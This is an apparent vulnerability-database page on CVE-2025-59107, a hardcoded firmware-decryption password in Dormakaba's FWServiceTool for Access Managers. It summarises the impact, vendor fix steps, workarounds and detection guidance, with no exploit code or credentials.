CVE-2025-59107
📋 TL;DR
Dormakaba's FWServiceTool uses a static, hardcoded password to decrypt encrypted ZIP files containing firmware updates for Access Managers. This allows attackers to extract and potentially tamper with firmware. Organizations using Dormakaba Access Managers with affected firmware versions are vulnerable.
💻 Affected Systems
- Dormakaba Access Managers
- FWServiceTool
⚠️ Manual Verification Required
This CVE does not have specific version information in our database, so automatic vulnerability detection cannot determine if your system is affected.
Why? The CVE database entry doesn't specify which versions are vulnerable (no version ranges provided by the vendor/NVD).
🔒 Custom verification scripts are available for registered users. Sign up free to download automated test scripts.
- Review the CVE details at NVD
- Check vendor security advisories for your specific version
- Test if the vulnerability is exploitable in your environment
- Consider updating to the latest version as a precaution
⚠️ Risk & Real-World Impact
Worst Case
Attackers decrypt firmware, inject malicious code, and deploy compromised firmware to access control systems, potentially gaining unauthorized physical access to secured areas.
Likely Case
Attackers extract legitimate firmware to analyze for other vulnerabilities, or tamper with firmware to create backdoors in access control systems.
If Mitigated
With network segmentation and strict access controls, attackers cannot reach the FWServiceTool or affected devices, limiting exposure.
🎯 Exploit Status
Exploitation requires access to the encrypted ZIP files or the FWServiceTool executable to extract the password. No authentication bypass is needed once the password is obtained.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Check vendor advisory for specific patched versions
Vendor Advisory: https://www.dormakabagroup.com/en/security-advisories
Restart Required: Yes
Instructions:
1. Review Dormakaba security advisory. 2. Identify affected firmware versions. 3. Download updated firmware from Dormakaba. 4. Use updated FWServiceTool (if provided) to apply firmware patches. 5. Restart Access Manager devices after update.
🔧 Temporary Workarounds
Network Segmentation
allIsolate Access Managers and FWServiceTool from untrusted networks to prevent unauthorized access.
Restrict Tool Access
windowsLimit access to FWServiceTool to authorized administrators only using file permissions and access controls.
🧯 If You Can't Patch
- Monitor network traffic to/from Access Managers for unusual firmware update attempts.
- Physically secure Access Manager devices and limit administrative access to trusted personnel only.
🔍 How to Verify
Check if Vulnerable:
Check if using Dormakaba Access Managers with firmware updated via FWServiceTool. Inspect FWServiceTool executable for hardcoded passwords (requires reverse engineering).Check Version:
Check device firmware version via Access Manager interface or vendor documentation.Verify Fix Applied:
Verify firmware version after update matches patched version from vendor advisory. Confirm new firmware ZIP files use unique, non-static passwords.📡 Detection & Monitoring
Log Indicators:
- Unauthorized firmware update attempts in Access Manager logs
- Failed decryption attempts on firmware ZIP files
Network Indicators:
- Unusual network traffic to/from Access Managers during non-maintenance windows
- Firmware file transfers from untrusted sources
SIEM Query:
Search for events related to firmware updates on Dormakaba Access Manager devices outside of scheduled maintenance periods.